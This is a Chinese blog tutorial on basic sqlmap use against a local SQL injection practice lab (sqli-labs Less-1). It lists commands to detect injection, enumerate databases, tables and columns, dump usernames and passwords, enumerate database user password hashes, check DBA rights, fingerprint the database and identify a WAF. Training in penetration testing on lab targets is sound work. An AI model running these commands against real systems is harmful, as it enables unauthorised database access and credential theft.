2021Kali系列 -- Sqlmap基础操作

简介: 2021Kali系列 -- Sqlmap基础操作

踏实的感觉大概就是,因为你在,我不再招摇,因为我在,你不再动摇。。。

----  网易云热评

 

‍一、判断是否存在注入‍

 

  •  
1、sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1'

image.png

2、有下面信息说明存在注入

image.png

 

二、获取数据库信息

 


sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1'   --dbs

image.png

三、获取数据库security里面的表信息

 

  •  
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security --tables


image.png

四、获取数据库security中users表的字段信息

 

  •  
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security -T users --columns
  • 1.

image.png

五、获取数据库security中users表中的字段内容

 

  •  
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security -T users -C "password,username" --dump


image.png

六、查看数据库相关信息

1、获取数据库当前用户

 

  •  
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --current-user
  • 1.

image.png

2、查看是否是dba权限

 

  •  
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --is-dba


image.png

3、查看当前数据库名称

 

  •  
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --current-db


image.png

4、枚举数据库用户密码

 

  •  
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --passwords


5、枚举数据库用户名称

 

  •  
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --users


image.png

七、指纹识别

1、获取更广泛的数据库管理系统指纹识别结果

 

  •  
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -f


 

2、获取更精确的指纹识别结果

 

  •  
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -b


 

八、WAF识别

 

  •  

复制

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --identify-waf
目录
相关文章
|
8月前
|
Python Windows
sqlmap安装及简介
sqlmap安装及简介
315 0
|
2月前
|
Java Python
2021Kali系列 -- BurpSuite(sqlmap插件)
2021Kali系列 -- BurpSuite(sqlmap插件)
20 0
|
2月前
|
开发工具
2021Kali系列 -- 基础命令学习(一)
2021Kali系列 -- 基础命令学习(一)
29 0
|
2月前
|
Shell 文件存储 数据安全/隐私保护
2021Kali系列 -- 基础命令学习(二)
2021Kali系列 -- 基础命令学习(二)
14 0
|
2月前
|
SQL 安全 测试技术
2021Kali系列 -- AWVS13安装使用
2021Kali系列 -- AWVS13安装使用
29 0
|
2月前
|
SQL
2021Kali系列 -- Burpsuite+Sqlmap批量扫描
2021Kali系列 -- Burpsuite+Sqlmap批量扫描
22 0
|
安全 Shell 测试技术
Metasploit -- 目录详解及常用命令
Metasploit -- 目录详解及常用命令
155 0
Metasploit -- 目录详解及常用命令
|
SQL 安全 关系型数据库
某教程学习笔记(一):12、sqlmap使用介绍
某教程学习笔记(一):12、sqlmap使用介绍
243 0
某教程学习笔记(一):12、sqlmap使用介绍
|
SQL Shell 数据库
|
移动开发 Ubuntu Shell